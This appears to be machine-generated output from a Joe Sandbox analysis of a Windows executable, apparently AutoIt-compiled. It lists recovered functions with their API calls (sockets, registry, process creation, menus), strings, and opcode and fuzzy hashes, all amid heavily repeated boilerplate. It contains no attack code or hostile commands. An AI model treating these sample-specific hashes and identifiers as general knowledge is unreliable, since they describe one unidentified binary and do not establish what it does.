Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5691e03b6b51c0464b118457de3a7826c5127a294456614345c9f8e931a28482
Instruction ID: 77c1446b033c24ef3b9c38361bee80abc75dc79a74c88beb63a19ecb4eb969ef
Opcode Fuzzy Hash: 5691e03b6b51c0464b118457de3a7826c5127a294456614345c9f8e931a28482
Instruction Fuzzy Hash: 7731FE30644250EFDB20CF1DDC84F9837E1BB4A715F1981A8F9219B2F2CB7AA8809B54

Function 006EDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDB54
SysAllocString.OLEAUT32(00000000), ref: 006EDB57
SysAllocString.OLEAUT32(?), ref: 006EDB75
SysFreeString.OLEAUT32(?), ref: 006EDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 006EDBA3
SysAllocString.OLEAUT32(?), ref: 006EDBB1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 58a99d063a5ad629567fb0b428b76359b42278f506fcd6869c6359e88cdd5ffb
Instruction ID: af63ab431f2592e03d6578c0ce5b07725ae3f1c5aff67394d46e3d6dea0b9dad
Opcode Fuzzy Hash: 58a99d063a5ad629567fb0b428b76359b42278f506fcd6869c6359e88cdd5ffb
Instruction Fuzzy Hash: BF218EB6601259AFAF10DFA9DC88CFB77ADEB09360B01C529FD14DB2A0E6749C418764

Function 00706173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00707D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00707DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007061C6
WSAGetLastError.WSOCK32(00000000), ref: 007061D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0070620E
connect.WSOCK32(00000000,?,00000010), ref: 00706217
WSAGetLastError.WSOCK32 ref: 00706221
closesocket.WSOCK32(00000000), ref: 0070624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706263

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: b561d6d2369d198dbfc38d647bdb890b3c853342726145e4953e8115637c6683
Instruction ID: f0d612537497207d94e017398c9f72cb70444040efb572bd26e26634b145b8a6
Opcode Fuzzy Hash: b561d6d2369d198dbfc38d647bdb890b3c853342726145e4953e8115637c6683
Instruction Fuzzy Hash: 66319E71600108EBDF10AF28CC95BBA7BEDEB45760F04812DF905A72D1DB78AC548AA5

Function 006EF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006EF671
__wcsnicmp.LIBCMT ref: 006EF692
__wcsnicmp.LIBCMT ref: 006EF6AC

Strings

#requireadmin, xrefs: 006EF68C
#notrayicon, xrefs: 006EF669
#OnAutoItStartRegister, xrefs: 006EF6A6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 6f5e27b532be1a028da15b68ebf3e719674f9b844974060ec80f9b5ed43e0f9d
Instruction ID: 92d3f7b0b4139e0153f14791a53a7e2a5433342dc4863ef60a6cb6aafead30c4
Opcode Fuzzy Hash: 6f5e27b532be1a028da15b68ebf3e719674f9b844974060ec80f9b5ed43e0f9d
Instruction Fuzzy Hash: D42137B22067A167DA20A736BC02EE773DBEF56350F50403DF44686251EBA19D82D399

Function 006EDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EDC2F
SysAllocString.OLEAUT32(00000000), ref: 006EDC32
SysAllocString.OLEAUT32 ref: 006EDC53
SysFreeString.OLEAUT32 ref: 006EDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 006EDC76
SysAllocString.OLEAUT32(?), ref: 006EDC84

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bd69ad0020a403550ad094a41610a6d3ea987ea281b028862b3730f72203df0c
Instruction ID: 15407c3de90d9ac0a337c00fb58baaee6a5cb7e63720e220232020b30334edc1
Opcode Fuzzy Hash: bd69ad0020a403550ad094a41610a6d3ea987ea281b028862b3730f72203df0c
Instruction Fuzzy Hash: B9216075605244AFAB10DBADDC88DEB77ADEB08760B10C125FD14CB2A0DAB4EC41C768

Function 007175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00717632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0071763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0071764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00717659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00717665

Strings

Msctls_Progress32, xrefs: 00717603

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c6d09ff0905554609db88a51251a92f8db5454599b690d3e12d9c29cf12a9cd8
Instruction ID: afda9e763c3e15f52ab2b8ed3076ed14f787dfd99fcb8bdbed5a96869032c9cb
Opcode Fuzzy Hash: c6d09ff0905554609db88a51251a92f8db5454599b690d3e12d9c29cf12a9cd8
Instruction Fuzzy Hash: D311B6B1150219BFEF158F68CC85EE77F6DEF08798F114114F604A6090C7769C61DBA4

Function 006B9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 006B9AE6

Part of subcall function 006B3187: EncodePointer.KERNEL32(00000000), ref: 006B318A
Part of subcall function 006B3187: __initp_misc_winsig.LIBCMT ref: 006B31A5
Part of subcall function 006B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006B9EA0
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006B9EB4
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006B9EC7
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006B9EDA
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006B9EED
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006B9F00
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006B9F13
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006B9F26
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 006B9F39
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006B9F4C
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006B9F5F
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006B9F72
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006B9F85
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006B9F98
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006B9FAB
Part of subcall function 006B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006B9FBE

__mtinitlocks.LIBCMT ref: 006B9AEB
__mtterm.LIBCMT ref: 006B9AF4

Part of subcall function 006B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,006B9AF9,006B7CD0,0074A0B8,00000014), ref: 006B9C56
Part of subcall function 006B9B5C: _free.LIBCMT ref: 006B9C5D
Part of subcall function 006B9B5C: DeleteCriticalSection.KERNEL32(02u,?,?,006B9AF9,006B7CD0,0074A0B8,00000014), ref: 006B9C7F

__calloc_crt.LIBCMT ref: 006B9B19
__initptd.LIBCMT ref: 006B9B3B
GetCurrentThreadId.KERNEL32 ref: 006B9B42

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 4f7c94c99832ecdf0a393a1ff310007874411587febebda1696b417bc8de01fc
Instruction ID: f8110212f0b758c187a2270f7ff4b370c33ec54baf435c2437a6dfad159ae8bb
Opcode Fuzzy Hash: 4f7c94c99832ecdf0a393a1ff310007874411587febebda1696b417bc8de01fc
Instruction Fuzzy Hash: 17F096B25197116AE6B47775BC036CB36979F02734F204A1EF754C62D2EF1094C14779

Function 0071B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0071B644
_memset.LIBCMT ref: 0071B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00756F20,00756F64), ref: 0071B682
CloseHandle.KERNEL32 ref: 0071B694

Strings

dou, xrefs: 0071B64D
ou, xrefs: 0071B63E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: ou$dou
API String ID: 3277943733-952475036
Opcode ID: 334c0669c75ccb296aee165a0f028efc9e0b860716d17d451857f8cace628aa7
Instruction ID: 9f9469b6af089161bde6d36cc479db894cfa6ae6835ad29070c20fe3f33e8eea
Opcode Fuzzy Hash: 334c0669c75ccb296aee165a0f028efc9e0b860716d17d451857f8cace628aa7
Instruction Fuzzy Hash: 23F05EF29403007AE7102765BC06FFB7A9DEB08396F408430FA09E61E2D7BA4C0087AC

Function 006B406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006B3F85), ref: 006B4085
GetProcAddress.KERNEL32(00000000), ref: 006B408C
EncodePointer.KERNEL32(00000000), ref: 006B4097
DecodePointer.KERNEL32(006B3F85), ref: 006B40B2

Strings

combase.dll, xrefs: 006B4080
RoUninitialize, xrefs: 006B4074

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 4bee32a39ab7a350848afb590f746924b023a09f0019f372c9e6b3b22bc479b0
Instruction ID: 9bf69dc713207ee11cd43fbbc52150892a99ff9f30ac7363417a493f985e59c5
Opcode Fuzzy Hash: 4bee32a39ab7a350848afb590f746924b023a09f0019f372c9e6b3b22bc479b0
Instruction Fuzzy Hash: 23E092B0681B04ABEA10AF75EC09BC53AA5BB14783F10C228F511E11F1CBBE8640AB18

Function 006F64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006F660B
_memmove.LIBCMT ref: 006F6546

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

_memmove.LIBCMT ref: 006F65B9
_memmove.LIBCMT ref: 006F66A0
_memmove.LIBCMT ref: 006F66B9
_memmove.LIBCMT ref: 006F66D5

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 34dc75f1d360b63ce599dc2d496eca258b29278931950623ef800f25f87fbebb
Instruction ID: 96c956e523bdfc3707cb177b1b50145abf506c5583d1dc050451e94e4311f116
Opcode Fuzzy Hash: 34dc75f1d360b63ce599dc2d496eca258b29278931950623ef800f25f87fbebb
Instruction Fuzzy Hash: D1619D7050025A9BDF41EF64CC82AFE3BAAAF05308F04451DFA556B292DB35ED06CB69

Function 007101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007102BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007102FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00710320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00710349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0071038C
RegCloseKey.ADVAPI32(00000000), ref: 00710399

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 977925befea7faccba588a5ac8feb172fdfba556a1fd23209c58561a551a106b
Instruction ID: 5a2b9e9994191eed63e50c19037b257a7b4c091b01f41c0c94680b5c55bd6e90
Opcode Fuzzy Hash: 977925befea7faccba588a5ac8feb172fdfba556a1fd23209c58561a551a106b
Instruction Fuzzy Hash: 37516A312082009FDB04EF68C885EAFBBE9FF89314F04491DF455872A2DB75E985CB96

Function 00715799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007157FB
GetMenuItemCount.USER32(00000000), ref: 00715832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0071585A
GetMenuItemID.USER32(?,?), ref: 007158C9
GetSubMenu.USER32(?,?), ref: 007158D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00715928

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: dfecc02fc27def2c765edbc6988057ddd2ce5f0b2bc3ebe22c1b34082353bd68
Instruction ID: 1b79c111684a83f9116124dbce9600e34c1b8ec0036cd22e46fde364231b163c
Opcode Fuzzy Hash: dfecc02fc27def2c765edbc6988057ddd2ce5f0b2bc3ebe22c1b34082353bd68
Instruction Fuzzy Hash: 04515F71E00615EFCF15DF68C845AEEB7B5EF48320F104059E801BB391DB74AE818B94

Function 006EEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006EEF06
VariantClear.OLEAUT32(00000013), ref: 006EEF78
VariantClear.OLEAUT32(00000000), ref: 006EEFD3
_memmove.LIBCMT ref: 006EEFFD
VariantClear.OLEAUT32(?), ref: 006EF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006EF078

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: b5b86fa17d7846859e16d91290fe2ef05b137d6e9c6f991a95cf9bfb15c2db5f
Instruction ID: 50da531750bb274cef90c465855bd565ee387c3fed8b2f2f65bde68d68ab1d6d
Opcode Fuzzy Hash: b5b86fa17d7846859e16d91290fe2ef05b137d6e9c6f991a95cf9bfb15c2db5f
Instruction Fuzzy Hash: 5D5178B5A00249EFCB10CF58C890AAAB7B9FF4C310B15856AED49DB341E335E911CFA0

Function 006F220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F22A3
IsMenu.USER32(00000000), ref: 006F22C3
CreatePopupMenu.USER32 ref: 006F22F7
GetMenuItemCount.USER32(000000FF), ref: 006F2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006F2386

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
Instruction ID: b7b83d3fdc385b29bf210fb0f4e2d64b4a21d27ae5acfab4cffe7c71dc8ed411
Opcode Fuzzy Hash: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
Instruction Fuzzy Hash: D0518BB160420EDBDF21CF68C8A8BFDBBE6AF45314F108129EA159B290D7789A45CF51

Function 00691765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0069179A
GetWindowRect.USER32(?,?), ref: 006917FE
ScreenToClient.USER32(?,?), ref: 0069181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069182C
EndPaint.USER32(?,?), ref: 00691876

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 677c69cb454ca61a904303457b51ce41653a0801621a0e120beadce69b46a1bd
Instruction ID: 8a18d0b2960ce274e300d4adba362c6ae536baa9bb54072eed179658a5e831a4
Opcode Fuzzy Hash: 677c69cb454ca61a904303457b51ce41653a0801621a0e120beadce69b46a1bd
Instruction Fuzzy Hash: DE419030100701AFDB10DF24CC84FB67BE9EB56724F148668F5A58B2A1C774A845DB65

Function 0071B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(007557B0,00000000,00D26AD0,?,?,007557B0,?,0071B5A8,?,?), ref: 0071B712
EnableWindow.USER32(00000000,00000000), ref: 0071B736
ShowWindow.USER32(007557B0,00000000,00D26AD0,?,?,007557B0,?,0071B5A8,?,?), ref: 0071B796
ShowWindow.USER32(00000000,00000004,?,0071B5A8,?,?), ref: 0071B7A8
EnableWindow.USER32(00000000,00000001), ref: 0071B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0071B7EF

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
